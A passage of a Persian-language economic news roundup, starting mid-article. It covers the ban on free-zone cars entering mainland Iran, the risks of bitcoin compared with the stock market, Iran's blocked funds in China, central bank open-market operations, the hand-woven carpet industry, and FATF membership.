فربد زاوه کارشناس حوزه خودرودرباره این تصمیم مجلس با اشاره به اینکه این پیشنهاد در مجموع با قانون ممنوعیت ورود خودروهای خارجی در حال تردد در مناطق آزاد به سرزمین اصلی مغایرت داشت تاکید کرد: واردات خوردو های خارجی در ابتدای دهه ۷۰ برای منطقه آزاد کیش مجاز شد در همان زمان این بند نیز در قانون دیده شد که این خودروها امکان ورود به سرزمین اصلی را ندارند.

به گفته زاوه، در مصوبه اولیه جزییات به صورت دقیق و کامل قید شده به همین دلیل نکته مبهمی در این مصوبه وجود نداشت؛ اما در مصوبه کمیسیون تلفیق ابهاماتی وجود داشت به همین دلیل در صورتی که بهارستان نشین ها می خواستند به لایحه کمیسیون تلفیق رای مثبت بدهند در ابتدا باید تکلیف قانون اول را روشن می کردند و پس از آن نسبت به تصویب قانون جدید اقدام می کردند. به گفته زاوه، در صورت تصویب ورود خودروهای در حال تردد در مناطق آزاد بدون تعیین تکلیف جزئیات قانون قبلی کارآمدی لازم را ندارد و ممکن است بسیاری از امور با گره‌های قانونی مواجه شوند.

زاوه در ادامه در خصوص شبهات مطرح شده مبنی بر اینکه مجلس تنها با ورود خودروهای آمریکایی به سرزمین اصلی مخالف کرده بود نیز تصریح کرد: این ممنوعیت شامل تمام خودروهای در حال تردد در مناطق آزاد می شود و تنها در برگیرند

ه خودروهای آمریکایی نیست.

با این شرایط می توان گفت تنها روزنه امید متقاضیان خودروهای وارداتی برای ورود خودروهای جدید به بازار بسته شد و باید منتظر بود که آیا واردات خودرو در مجموع آزاد خواهد شد یا اینکه همچنان ورود خودرو به کشور ممنوع خواهد بود و شاهد انحصار در بازار خودرو خواهیم بود.

 

۹ : سرمایه گذاری در بیت کوین یا بورس؟

در بازار جهانی پیش‌بینی شده که رمز ارزها وارد یک فضای حباب‌گونه شده‌اند و مردم باید با احتیاط بیشتری برای سرمایه‌گذاری در این بازار اقدام کنند.

پس از کاهش شاخص بورس و ضرر و زیان بالای سهامداران، رمز ارزها به‌ویژه بیت کوین به عنوان محلی برای سرمایه‌گذاری، جایگزین بازار سرمایه شد و سرمایه‌گذاران بدون توجه به ریزش شاخص بورس و با اکتفا به رشدهای غافلگیرکننده رمز ارزها سرمایه‌های خود را وارد این بازار کرده اند و این بازار به عنوان نخستین گزینه سرمایه‌گذاری در جهان، در کسب بازدهی از دیگر بازار سبقت گرفت.

در داخل کشور، سرمایه‌گذارانی که در چند وقت اخیر بخشی از سرمایه خود را در بازار سهام از دست داده اند، بدون توجه به صحبت کارشناسان که بارها اعلام کرده اند رمز ارزها گزینه مناسبی برای سرمایه گذاری نیستند با تصور جبران ضررهای متحمل شده، سرمایه های خود را وارد این بازار کرده اند و امیدوار به کسب بازدهی‌های چشمگیر در این بازار هستند.

بیت ‌کوین در سرمایه گذاری، مسیری مشابه با بازار سرمایه را ادامه داد و با شکستن مقاومت های پیش رو وارد دوران رونق شد، اما این موضوع جای تعجب است که سرمایه گذاران بدون درنظر گرفتن هشدارهای سهامداران در زمینه بالا بودن نوسان در این بازار و احتمال ریزش های سنگین هم‌چنان نسبت به این بازار امیدوار هستند و سرمایه های خود را وارد این بازار می کنند.

در همین موضوع، «امیرعلی امیرباقری» کارشناس بازار سرمایه به خطرهای تهدیدکننده سرمایه گذاری در رمز ارزها اشاره کرد و افزود: سرمایه گذاری در رمز ارزها و کسب بازدهی کلان از این بازار از جمله مسایلی است که به‌تازگی بسیار به گوش می رسد، این موضوع باید مورد توجه قرار گیرد که رمز ارزها در زمره سرمایه گذاری هایی قرار دارند که می توانند جزو پرریسک ترین بازارها برای سرمایه گذاری محسوب شوند.

وی با بیان اینکه هیچ‌گونه معیاری برای ارزش‌گذاری رمز ارزها وجود ندارد، اظهار داشت: به هیچ عنوان وجود مبنا برای ارزش گذاری این رمز ارزها امکان پذیر نیست و با معیار ارزش گذاری در بازارهای دیگر نمی توان اقدام به محاسبه قیمت ذاتی این رمز ارزها کرد تا از این طریق معاملات توجیه‌پذیر شوند.

امیرباقری گفت: وجود نوسان های شدید در رمز ارزها ناشی از عدم وجود قیمت ذاتی است و فقط نیروی عرضه و تقاضا بر این بازار موثر و تعیین کننده مسیر معاملات است.

کارشناس بازار سرمایه بیان‌داشت: در بازار جهانی پیش بینی شده که بازار رمز ارزها وارد یک فضای حباب‌گونه شده است و سرمایه گذاران باید برای سرمایه گذاری در این بازار احتیاط کنند.

وی به سرازیر شدن سرمایه ریالی به سمت رمز ارزها اشاره کرد و اظهار داشت: این سرمایه ها باید به صورت ارزهای خارجی از کشور خارج شوند، اما در شرایط کنونی که کشور در تنگنای ارزی قرار دارد این عمل نمی‌تواند اقدامی شایسته باشد.

امیرباقری ادامه‌داد: بانک مرکزی و سایر نهادهای نظارتی باید دقت مضاعفی داشته باشند تا مانع از خروج ارز از کشور و به خطر افتادن سرمایه سرمایه گذاران در این فضای ملتهب شوند.

این کارشناس بازار سرمایه در ادامه علاوه بر وجود خطر برای سرمایه گذاری در رمز ارزها، به وجود نوسان در معاملات بازار سهام اشاره کرد و گفت: در چند وقت اخیر در بازار سهام هم شاهد عرضه های شدید سهام، فشار فروش و خروج نقدینگی هستیم اما یکی از دلایلی که اکثر سهام بازار در مسیر نزولی قرار داشتند اما شاخص بورس چندان واکنش زیادی را از خود نشان نداد و افت آن متناسب با فشار فروش سهام بازار نبود، ناشی از ایجاد محدودیت دامنه نوسان در بازار بود که سمت منفی آن در سطح ۲ درصد نگه داشته شده و اجازه اصلاح سنگین به شاخص بورس را در بازار نمی دهد.

امیرباقری افزود: طبق پیش بینی های انجام شده، محدود کردن دامنه نوسان در روند منفی، اصلاح قیمتی را به اصلاح زمانی تبدیل می کند و بازار را در مسیر فرسایشی قرار می دهد.

وی ادامه‌داد: بازارها زمانی می توانند به سمت کارایی حرکت کنند که دامنه نوسانی در بازار وجود نداشته باشد و قیمت ها با توجه به عرضه و تقاضا و براساس واقعیت های اقتصادی تعیین شوند.

این کارشناس بازار سرمایه با بیان اینکه وجود دامنه نوسان در بازار باعث ایجاد جهت‌دهی و محدودیت معاملات و در نتیجه منجر به افزایش انحراف از کارایی مطلوب بازار می شود، گفت: پیشنهاد می شود تا نسبت به بازگشت شرایط معاملات بازار به شرایط قبل تلاش شود و انتظار می رود تا بازار با قوانین جدید دستخوش فشار مضاعف نشود.

امیرباقری به وجود فضای نوسانی در بازار داخلی ارز تاکید کرد و بیان‌داشت: نرخ ارز در رقمی بین ۲۱ تا ۲۵ هزار تومان در نوسان است و ریشه های این موضوع، وجود نوسان در سیاست خارجی است که اکنون کشور در حال تجربه آن است.

کارشناس بازار سرمایه اظهار داشت: با توجه به چرخش مسایل سیاسی در آمریکا و سیگنال هایی که به لحاظ اقتصادی در خروج از تحریم دریافت می شود، به‌طور عمده فعالان بازار چشم انداز تورم را افزایشی نمی بینند و با توجه به احتمال ایجاد فضای رکودی، احتمال تسری این موضوع به همه بازار وجود دارد و بازارهای سرمایه گذاری را تحت تاثیر خود قرار خواهد داد.

وی با بیان اینکه بازار سرمایه از جمله بازارهایی است که از این موضوع تاثیر می پذیرد، افزود: زمانی که چشم انداز بالایی برای نرخ ارز متصور نباشیم تورم کنترل می شود که این امر زمینه ایجاد فضای رکودی در کلیت اقتصاد را فراهم می کند، در نهایت ضمن کاهش چشم اندازها شاهد فشارها بر روی قیمت ارز خواهیم بود؛ به همین دلیل در کوتاه مدت نباید در انتظار روندهای انگیزشی قوی در بازار باشیم.

امیرباقری گفت: به نظر می رسد با توجه به پیش بینی ها در زمینه بهبود شرایط سیاسی، لغو حدودی تحریم ها، ایجاد فضای مطلوب اقتصادی، تا اندازه‌ای در میان مدت و بلندمدت تنفس اقتصادی برای کشور ایجاد شود و از طرفی، دولت حاضر و دولت های بعدی به این نتیجه رسیدند که کنترل دستوری نرخ ارز راهکار مناسبی نیست و انتظار می رود در میان مدت و بلندمدت فضای بازار سرمایه با کلیت اقتصاد رشد کند.

کارشناس بازار سرمایه با بیان اینکه سرمایه گذاران باید در محاسبات خود پارامترهای اقتصادی و چشم اندازها را در نظر بگیرند، خاطرنشان کرد: با توجه به چشم اندازها باید سناریوهای مختلفی در نظر گرفته و هر سناریو منجر به محاسبه سود شرکت ها شود تا در چیدمان پرتفوی خود بتوانند سبد بهینه ای را برای رسیدن به بازدهی مطلوب کسب کنند.

وی تاکید کرد: در شرایط فعلی که قیمت ها نوسان دارند باید پرتفوی سرمایه گذاری را از ریسک های فزاینده مصون کرد؛ بنابراین سرمایه گذاران می توانند به جای خروج سرمایه های خود از بازار سهام و ورود آن به فضای بانک، از ابزار بدون ریسک مانند صندوق با درآمد ثابت و اسناد خزانه که در بازار وجود دارد استفاده کنند.

امیرباقری با بیان اینکه براساس تحقیقات انجام شده عمده پولی که وارد بانک می شود دیگر به راحتی وارد بازار سرمایه نمی شود، گفت: فعالان بازار نباید چنین تصوری داشته باشند که با ورود بازار به فاز صعودی شاهد ورود نقدینگی ها به سمت بازار سهام باشیم، زیرا همیشه بعد از روند نزولی سنگین بازار سهام، بدبینی هایی در بازار ایجاد می شود که این امر باعث می شود تا سرمایه خارج شده از بازار به راحتی دوباره وارد بازار سهام نشود.

به گفته وی،به سهامداران توصیه می شود که برای سرمایه گذاری از بازار های متنوعی استفاده کنند تا در صورت تغییر مسیر و چرخش روند بازار، همراه با معاملات بازار باشند و از فرصت های سرمایه گذاری بهره مند شوند.

وی با بیان اینکه به نظر می رسد بازار ریزش سنگینی را تجربه نکند و بیشتر از اصلاح قیمتی شاهد اصلاح زمانی در بازار باشیم، اظهار داشت: این اقدام این فرصت را به سرمایه گذاران می دهد تا سهام برتر را در بازار انتخاب و بدون عجله اقدام به معامله در این بازار کنند و افق میان مدت و بلندمدت را برای سرمایه گذاری داشته باشند تا از این طریق از فرصت های ایجاد شده در بازار منتفع شوند.

 

۱۰ : ایران در چین چقدر پول‌ بلوکه شده دارد؟

رییس اتاق مشترک بازرگانی ایران و چین گفت: ما از بابت نفت، طلبی از چین نداریم. به چین نفت می‌فروشیم و در مقابل آن کالا وارد می‌کنیم.این خرید و فروش جاری مازادی ندارد و هر کالایی که نیاز داشته باشیم از جمله تکنولوژی و ماشین‌آلات را می‌توانیم از چین خریداری کنیم.

مجیدرضا حریری رییس اتاق مشترک بازرگانی ایران و چین در مورد پول‌های بلوکه شده کشور گفت: پول‌هایی که ما در خارج از کشور داریم ماهیت‌های متفاوتی دارند، بعضی از آنها ذخایر ارزی بانک مرکزی و بعضی پول‌های جاری و حاصل از فروش نفت هستند. فقط بانک مرکزی می‌داند که چه مقدار ذخایر ارزی در خارج از کشور داریم و بانک مرکزی نیز چنین آماری را منتشر نمی‌کند به این دلیل که جزو آمار محرمانه است.

وی افزود: پول‌هایی که جزو ذخایر ارزی هستند در هر کشوری که باشند، دیگر برای دولت قابلت خرج کردن ندارند یعنی یک بار این پول‌ها خرج و به جای آن ریال چاپ شده و دست مردم است. در حقیقت این ذخایر پشتوانه ریال و پول ملی هستند.

رییس اتاق مشترک بازرگانی ایران و چین اشاره کرد: یک سری دیگر از پول‌ها که در کره جنوبی، هند و چند کشور دیگر داریم، حاصل فروش نفت هستند یعنی قبل از تحریم‌های اخیر امریکا در دوران آقای ترامپ، ۶ ماه به این کشورها مهلت داده شد تا از ایران نفت بخرند اما نمی‌توانستیم پول آن را از این کشورها دریافت کنیم. بعضی از کشورها مانند مانند چین و هند در مقابل نفت به ما کالا می‌فروشند اما بعضی کشورها مانند کره و ژاپن در مقابل این پول‌ها کالا هم به ایران نمی‌فروشند. باید توجه داشت که به دلیل تحریم‌ها امکان جابجایی پول‌های بانک مرکزی در هیچ کجای دنیا وجود ندارد.

وی افزود: تا جایی که من اطلاع دارم ما از بابت نفت، طلبی از چین نداریم. به طور جاری به چین نفت می‌فروشیم و در مقابل آن کالا وارد می‌کنیم. بنابراین این خرید و فروش جاری مازادی ندارد و هر کالایی که نیاز داشته باشیم از جمله تکنولوژی و ماشین‌آلات را می‌توانیم از چین خریداری کنیم. اما برای مثال از هند کالایی جز برنج نمی‌توانستیم وارد کنیم که مناسب بازار ما باشد که آن هم اشباع شد. یا کره جنوبی که در مقابل نفت هیچ کالایی به ما نفروخته است و شاهد بودیم حتی کمپانی‌های کره‌ای از ایران خارج شدند.

حریری همچنین خاطرنشان کرد: عدد و رقم پول‌های بلوکه شده را جز بانک مرکزی که خزانه‌دار کشور است، نمی‌داند. بقیه ارقام را بر اساس حدس و گمان اعلام می‌کنند که این حدس و گمان‌ها کار درستی نیست، آن هم در مورد موضوعی که جزو محرمانه‌های کشور است و فقط متولی اصلی آن باید در مورد آن صحبت کند.

۱۱ : هشدار رئیس کل بانک مرکزی به گردانندگان سایت های قمار

رئیس کل بانک مرکزی گفت: مشخصات ۲۰ هزار کارت بانکی مورد استفاده سایت‌های قمار را به قوه قضائیه دادیم.

عبدالناصر همتی، رئیس کل بانک مرکزی گفت: مشخصات ۲۰ هزار کارت بانکی مورد استفاده سایت‌های قمار و شرط بندی پس از مسدود شدن به قوه قضائیه داده شده است.

وی اضافه کرد: به صاحبان بیش از ۴۵۰ هزار کارت بانکی هم هشدار، اخطار داده شده و در نهایت هم معرفی آنها را به دستگاه قضا در برنامه داریم.

 

۱۲ : اعداد سیگنال دهنده به بازار ارز/ سمت و سوی قیمت دلار

برای قیمت دلار امروز عدد ۲۴ هزار و ۵۰۰ تومان و ۲۶ هزار ۲۰۰ تومان از اهمیت زیادی برخودار است. در معاملات پشت خطی قیمت دلار وارد فاز افزایشی شد که سیگنال معنا داری به بازار امروز است اما معامله گران منتظر عرضه ارز و کاهش قیمت هستند.

ادامه اثر واعظی در بازار ارز؟
با وجود اینکه، دیشب دلار وارد فاز افزایشی شد، ممکن است امروز عرضه ارز افزایش پیدا کند. به گفته فعالان، شائبه های پیش آمده در مورد نقش دولت در افزایش قیمت دلار پس از اظهارات واعظی، ‌رییس دفتر ریاست جمهوری ممکن است موجب شود که عرضه ارز زیاد شود. دولت برای اینکه این اتهام(افزایش عمدی قیمت دلار) را از خود مبرا کند،‌ می تواند اقدام به افزایش عرضه ارز کند . این احتمال از آن جهت تقویت می شود که چشم انداز سیاست گذار، بهبود درآمدهای ارزی و دسترسی به آن هاست. در این شرایط ممکن است از ذخایر ارزی بیشتر برای مدیریت قیمت دلار استفاده شود.

افزایش دیگری برای قیمت دلار؟
در حالی که بخشی از معامله گران امیدوارند با تقویت سمت عرضه، قیمت دلار به سطوح پایین تری برود، گروهی از بازیگران ارزی باور دارند، افزایش دیگری برای دلار اتفاق خواهد افتاد. آن ها عنوان می کنند که در سال جاری میان ایران و آمریکا توافقی رخ نخواهد داد و این موضوع موجب می شود که معامله گران احتیاطی به بازار برگردند و خریدهای خود را بیشتر کنند. در کنار این،‌ گروه زیادی دلار را با قیمت های بالا خریداری کرده اند و طبیعی است که با استفاده از اخبار سیاسی سعی کنند، قیمت را بالاتر ببرند.

با وجود تمام این انتظارات،‌ به نظر می رسد معامله گران بیشتر به صورت روزانه موقعیت خرید و فروش خود را تنظیم کنند. به عنوان مثال،‌ اگر امروز حواله درهم زیر مرز ۷ هزار تومانی باقی بماند، میزان فروش های دلار در بازار داخلی بیشتر می شود.

 

۱۳ : خرید و فروش بیت‌کوین در کشور آزاد می‌شود؟

همزمان با افزایش خرید و فروش بیت کوین در داخل کشور، رئیس کل بانک مرکزی به بیان توضیحاتی درباره مجاز بودن یا نبودن این معاملات پرداخت.

طی هفته‌های اخیر و همزمان با افزایش محسوس قیمت بیت کوین در دنیا، تعداد زیادی از مردم نیز راهی بازار رمرزارز‌ها مخصوصاً بیت کوین شده اند که البته برخی هم که نا آشنا به این بازار بوده اند در این راه گرفتار سودجویان و کلاهبرداران قرار گرفته اند.

کلاهبرداران با داغ شدن بازار رمز ارزها، ارز‌های تقلبی به مردم فروخته و سرمایه‌های آن‌ها را به سرقت می‌برند؛ نمونه بارز آنهم فروش بیت کورن به جای بیت کوین است! از این دست کلاهبرداری‌ها اخیراً در کشور افزایش یافته است.

هنوز قانونی در ایران برای خرید و فروش بیت کوین وجود ندارد، ولی نکته ابهام برانگیز اینجاست که دولت به ماینر‌ها اجازه فعالیت داده، ولی مشخص نیست تکلیف بیت کوین‌های تولید شده چه می‌شود!

تزریق نقدینگی در بازار باز با هدف تثبیت در عملیات این هفته بازار باز رخ داد. این در حالی است که اعتبارات قاعده مند سومین رکورد را در زمستان ثبت کرده و نرخ سود مداخله ای کشف شده در قله خود قرار گرفت.

طبق برنامه ریزی بانک مرکزی در تغییر تاریخ سررسید عملیات بازار باز، این نهاد روز دوشنبه به کنترل نقدینگی در بانکها پرداخت.

برای چهارمین هفته متوالی هدف بانک مرکزی در برگزاری این بازار، تثبیت نقدینگی بوده است. اما خالص عملکرد این بازار نشان از قبض ۶۴۰ میلیارد تومان نقدینگی بوده است.

اتفاق مهم دیگری که در این هفته به وقوع پیوست حجم بالای اعتبارات قاعده مند بوده که سومین رکورد زمستانی را در این حوزه به ثبت رسانده است. این رقم با ارزش ۱۲ هزار و ۱۹۰ میلیارد تومان سومین رکورد در تزریق نقدینگی زمستانی در بازار شبانه بوده است.

درهر هفته بانک مرکزی در اطلاعیه ای گزارش عملکرد دو بازار را ارائه می دهد. این دو عبارتند از بازار باز و بازار شبانه.

هدف از این بازارها کنترل نقدینگی بانکها و تعیین نرخ سود در بازاربین بانکی است. اهمیت دوبازار فوق از آن جهت است که نقش تعیین کننده ای را در تحقق یافتن نرخ تورم پیش بینی شده توسط بانک مرکزی دارد. به عبارت دیگر کارکرد بهینه این بازارها می‌تواند بر قدرت خرید آحاد جامعه تاثیرگذار باشد.

اما عملیات بازار باز چیست و بانک مرکزی در ان چه مسیری را دنبال می کند؟

بازار باز چیست؟
در بازار باز در هر هفته بانک مرکزی اوراق پیشنهادی بانکها را متناسب با سیاستهای کنترلی خود در به دام انداختن نرخ سود و بهبود شرایط نقدینگی بانکها خریداری می‌کند. این فروش اوراق توسط بانکها اما شرایطی دارد.

قاعده خرید و فروش در این بازار باز گرداندن این مبلغ توسط بانکها با نرخ سودی مشخص و با سررسیدی ۱۴ روزه است. این عمل را می توان در معنای قبض پول در هر هفته در بازار باز نامید که با کسر این مبلغ از کل تزریق هفتگی توسط بانک مرکزی در این بازار، خالص قبض و بسط پول در این مدت به دست می آید.

در این باره از هفته پیش بانک مرکزی به منظور مدیریت زمان سررسید بانکها در تصادف با عید، سررسید اوراق را از ۱۴ روز در هفته گذشته به ۵ روز و در هفته بعد به ۷ روز تغییر داد.

در همین خصوص در روز ۱۲ اسفند ماه ۲ هزارو ۷۲۰ میلیارد تومان نقدینگی به بانکها در قالب بازار باز تزریق شده و ۳ هزار و ۳۶۰ میلیارد تومان نیز طی عملیات ریپو ( ۵ روزه) توسط بانک مرکزی جمع آوری شده است.

رقم قبض شده توسط بانک مرکزی در ادامه باز فروش اوراقی است که در روز ۶ اسفند با نرخ سود ۱۹٫۸۱ درصد و تاریخ ۵ روزه خریداری شده بود. فروش ۳ میلیارد و ۱۱۰میلیون تومان اوراق توسط این نهاد در بازار ثانویه نیز شکل دیگری از قبض پول در معاملات هفته گذشته بوده است.

در نهایت با کسر قبض و بسط پول از یکدیگر محاسبه می شود که در عملیات این هفته خالص عملکرد بانک مرکزی قبض ۶۴۳ میلیارد و ۱۱۰ میلیون تومان از بانکها بوده است. اتفاق مهم دیگر در این بازار ثبات نرخ سود در ۶ هفته گذشته است که در حد ۱۹٫۸ درصد ثابت مانده و تغییری نداشت.

رکورد نرخ سود مداخله دولت در بانکها
در کنار بازار باز، بازار دیگری وجود دارد که بانکها در صورت برخورد جدی به کسری، نیازمند استقراض فوری پول از یکدیگر هستند. به این اقدام بازار شبانه یا بازار بین بانکی می گویند.

نرخ سودی که بانکها طی آن از یکدیگر استقراض می کنند رانرخ سود بین بانکی می گویند. در صورتی که این استقراض کوتاه مدت از بانک مرکزی صورت بگیرد به اعتبارات قاعده مند گفته

مهمترین خصیصه این بازار آن است که باید مبلغ قرض شده را با نرخ سود سقف یعنی ۲۲ درصد و در فاصله کوتاه زمانی ( تقریبا دو یا سه روزه ) باز گردانند.

اکنون دراین بازار در هفته گذشته بانک مرکزی تزریق زیادی در اعتبارات قاعده مند صورت گرفته که سمین رکورد را در میان آمارهای ثبت شده در زمستان داشته است. این حد برابر با ۱۲ هزار و ۱۹۰ میلیارد تومان بوده است.

در صورتی که بسط پول در بانکها را به صورت دو بازار در نظر بگیریم این رقم به ۱۴ هزار و ۹۱۰ میلیارد تومان خواهد رسید

ترکیب دوبازار می تواند گویای کل نقش بانک مرکزی در بانک‌ها باشد. تفاضل کل قبض صورت گرفته از مجموع بسط نقدینگی در هفته اخیر برابر با ۱۱ هزار و ۵۵۰ میلیارد تومان بوده که خالص مداخله این نهاد در بانک‌ها به حساب می آید.

با توجه به آنکه در هر کدام از بازارها ( بازار باز و بازار بین بانکی) هر تزریق با نرخ سودی مشخص صورت گرفته بنابراین می توان نرخ سود موزون را برای خالص مداخله بانک مرکزی در هفته اخیر محاسبه کرد. این رقم در این مدت به ۲۱٫۶ درصد رسیده که بالاترین نرخ سود محاسبه شده در کل هفته های زمستانی بوده است.

 

۱۹ : جهانگیری: در زمان لازم درباره نوسانات ارز صحبت خواهم کرد

 

معاون اول رئیس جمهور با اعلام اینکه در زمان لازم درباره نوسانات ارز صحبت خواهد کرد، گفت: سیاست هایی که در جنگ اقتصادی تنظیم و اجرا شد باید متناسب با شرایط جدید اصلاح شوند.

اسحاق جهانگیری در جلسه ای در خصوص مسایل مربوط به فرش دستباف کشور با اشاره به جایگاه صنعت فرش در صادرات غیرنفتی کشور گفت: در سال های گذشته گاهی صادرات فرش به یک میلیارد دلار می رسید که ۵۰ درصد از صادرات غیرنفتی آن سال ها را تشکیل می داد اما امروز رقم این صادرات به ۵۰ تا ۶۰ میلیون دلار کاهش یافته که موضوعی متأثر کننده است و باید تلاش کنیم تا صنعت فرش دستباف بتواند جایگاه گذشته خود را به دست آورد.

معاون اول رییس جمهور با اشاره به حضور رقبای جدید در صنعت فرش دستباف، اظهار داشت: وزارت صنعت، معدن و تجارت، مرکز ملی فرش ایران و اتحادیه های مرتبط با این صنعت ضرورت دارد ضمن آسیب شناسی، راهکارهای لازم برای جبران این عقب ماندگی را ارائه کنند.

جهانگیری تصریح کرد: زندگی بخش عظیمی از مردم ایران وابسته به صنعت فرش دستباف است و نمی توانیم نسبت به کاهش درآمد آنها و آسیب دیدن اقتصاد زندگی روستاییان و عشایر بی تفاوت باشیم زیرا این آسیب ممکن است به مهاجرت روستاییان و پدیده حاشیه نشینی یا زندگی دشوار و تحت پوشش کمیته امداد امام خمینی (ره) منجر شود.

وی با تأکید به اینکه همه اجزای دولت از استانداران و فرمانداران و متولیان سایر دستگاه ها باید موضوع فرش را تبدیل به مسأله جدی حوزه فعالیت خود کنند، گفت: همه باید در این زمینه با جدیت تلاش کنیم تا زندگی کسانی که مرتبط با این صنعت هستند، به مخاطره نیفتد.

جهانگیری افزود: حتماً ستاد راهبری فرش به ریاست وزیر صنعت، معدن و تجارت باید به طور مستمر و ماهیانه با حضور دستگاه ها برگزار شود تا موانع پیش روی صنعت فرش دستباف از زنجیره تولید تا موضوع صادرات و فروش برطرف شود.

معاون اول رییس جمهور با اشاره به اظهارات یکی از حاضران در جلسه در خصوص واردات پشم و از بین بردن مواد اولیه در داخل کشور؛ از وزارت صنعت، معدن و تجارت و جهاد کشاورزی خواست تا موضوع آتش زدن پشم گوسفندان در کشتارگاه ها را پیگیری کند و از همه مواد اولیه لازم برای کمک به تولیدکنندگان استفاده نمایند.

وی با بیان اینکه مسأله آموزش و مهارت موضوعی جدی است و نمی توان با اتکا به آموزش های سنتی چشم به بازارهای جهانی داشت از آموزش فنی و حرفه ای کشور خواست با برنامه ریزی در این خصوص چشم انداز جدیدی پیش روی تولیدکنندگان کشور باز کند.

معاون اول رییس جمهور با اشاره به ضرورت ارائه تسهیلات به کارگاه های بزرگ و کوچک تولید فرش در کشور، تصریح کرد: می توانیم با برنامه ریزی و شناخت نیازهای مصرف کنندگان به تدریج از عقب ماندگی ها را در تولید و صادرات فرش کاهش دهیم.

وی در ادامه با اشاره به شرایط دشوار کشور در سال ۱۳۹۹ از نظر منابع درآمدی گفت: مردم و اقتصاد کشور در شرایط سختی قرار گرفتند با این وجود ایران دارای ظرفیت های فراوانی است به طوری که در ده ماهه سال جاری بانکهای کشور بیش از یک میلیون و چهارصد هزار میلیارد تومان تسهیلات ارائه کرده اند. این در شرایطی است که کل منابع مورد نیاز برای صنعت فرش دستباف کشور شاید به هزار میلیارد تومان نرسد، از وزارتخانه های تعاون کار و رفاه اجتماعی و صنعت، معدن و تجارت و نیز بانک مرکزی می خواهم که از منابع خود برای تأمین سرمایه در گردش و تسهیلات ایجاد کارگاه فرش رقم خوبی اختصاص دهند.

معاون اول رییس جمهور تأکید کرد حتماً یکی از بازارهای بزرگ فروش فرش، بازار داخلی ایران است البته باید تقاضا در بازار را تحریک کرد، می توان با هماهنگی نظام بانکی تسهیلات چندساله برای خرید فرش دستباف به متقاضیان ارائه کرد. اینگونه اقدامات و ایجاد انگیزه نوعی حمایت از تولید در سال جهش تولید محسوب می شود که می تواند آثار خوبی به دنبال داشته باشد.

وی با ارائه توضیحاتی در خصوص قوانین سختگیرانه برای صادرکنندگان و تجار در یکی دو سال اخیر گفت: دولت بعد از سال ۱۳۹۷ که تحریم های جدی از سوی آمریکا اعمال شد برای اداره اقتصاد کشور نیازمند اتخاذ سیاست های تجاری مناسب با اوضاع شد هر چند ما طرفدار استقرار این سیاست ها نبودیم چنان که از برنامه سوم توسعه هیچ مانع اداری جز تعرفه برای واردات و صادرات وجود نداشت و این از افتخارات کشور بود.

جهانگیری با بیان اینکه تلاش ما در این برهه حساس برای اداره کشور کاستن از میزان تقاضای ارز در بازار بود، گفت: مکرر گفته ام در زمان لازم در این خصوص صحبت خواهم کرد اما عده ای با بی انصافی حرف هایی می زنند که موجب سرخوردگی مدیران کشور می شود. در جنگ اقتصادی که تلاش کرده ایم با چنگ و دندان مانع از فروپاشی اقتصاد کشور شویم برخی فرصت را غنیمت شمرده و انتقادهای ناروایی مطرح می کنند.

معاون اول رییس جمهور گفت: در این دوره واردات بیش از دو هزار پانصد ردیف تعرفه ای ممنوع شد که تنها یک مورد آن خودرو بود که به تنهایی می توانست تقاضای ارز را به شدت بالا ببرد. این یک واقعیت است که هیچ کس در این مقطع نمی تواند بگوید که ما صادرات می کنیم و مابه ازای آن را به اقتصاد کشور برنمی گردانیم.

وی تصریح کرد: ممکن است این سیاست ها در بخش های دیگری فشار ایجاد کرده باشد، به ویژه زندگی مردم دشوارتر شده است اما ما توانستیم از این مقطع سربلند بیرون بیاییم آن هم در شرایطی که آمریکایی ها فکر می کردند در همان شوک اول اقتصادی قیمت ارز در ایران سرسام آور شده و اقتصاد کشور به فروپاشی می انجامد.

معاون اول رییس جمهور با بیان اینکه به آینده کشور خوشبین هستم، گفت: رییس جمهور و تیم جدیدی که درآمریکا بر سر کار آمدند فهمیده اند که سیاست فشار حداکثری سیاستی شکست خورده است و مجبور هستند در برابر ملت بزرگ ایران با زبان احترام و منطق سخن بگویند، بهتر نتیجه می گیرند.

دکتر جهانگیری تأکید کرد: سیاست هایی که در جنگ اقتصادی تنظیم و اجرا شد باید متناسب با شرایط جدید اصلاح شوند همینطور سیاست های مرتبط با واردات و صادرات کشور تصحیح خواهد شد.

در این جلسه که وزرای صنعت، معدن و تجارت و تعاون، کار و رفاه اجتماعی حضور داشتند وزیر صنعت معدن و تجارت با ارائه گزارشی در خصوص وضعیت فرش دستباف کشور راهکارها و اقدامات این دستگاه با کمک اتحادیه های فرش دستباف برای رونق تولید، اشتغالزایی، صادرات، بیمه فرش بافان، و خانه های فرش و شناسنامه دار کردن فرش ایرانی خبر داد.

در این جلسه محمد امید معاون توسعه روستایی و مناطق محروم با ارائه گزارشی در خصوص صنعت فرش دستباف گفت: این صنعت، صنعتی استراتژیک و نماد فرهنگ و تمدن کشور است و بیش از دو میلیون نفر به طورمستقیم در آن اشتغال دارند.

همچنین رافع رییس مرکز ملی فرش ایران و برخی از روسای اتحادیه تولیدکننده و صادرکننده فرش، نظرات و دیدگاه های خود را به طور مبسوط بیان کردند.

 

۲۰ : وقتی به FATF نپیوسته ایم مجبوریم با بانک های زیرپله ای چین کار کنیم

درصورت بازگشت همه طرف‌ها به برجام، اگر ایران «اف.ای.تی.اف» را نپذیرد، نخواهد توانست با نظام بانکی جهان کار کند.

آیا ایران می‌خواهد با جهان تجارت کند؟ آیا می‌خواهیم با نظام اقتصادی جهان تعامل داشته باشیم؟ اگر پاسخ به این پرسش‌ها مثبت است و می‌خواهیم و دوست داریم که ایران جایگاه واقعی خود را در تجارت جهانی داشته باشد، یک ضرورت این امر، ارتباط نظام بانکی ایران با نظام بانکی جهان یا کشورهای طرف مبادله است.

زیرا در دنیای امروز نه تنها نمی‌توان پول را با چمدان منتقل کرد، بلکه چه بپسندیم یا نپسندیم، «اف.ای.تی.اف» به یکی از نهادهای هنجارساز نظام بانکی دنیا تبدیل شده است.

از این رو چه ایران و چه هر کشور دیگری که بخواهد با این نظام بانکی و پولی جهان کار کند و دادوستد داشته باشد، باید در این چارچوب هنجاری عمل کند. در این میان برخی منتقدان، چه بسا از موضع دلسوزی برای کشور و نظام، ادعا می‌کنند که در صورت پیوستن به «اف.ای.تی.اف» اطلاعات مالی و بانکی محرمانه ما در اختیار کشورهای متخاصم قرار خواهد گرفت.

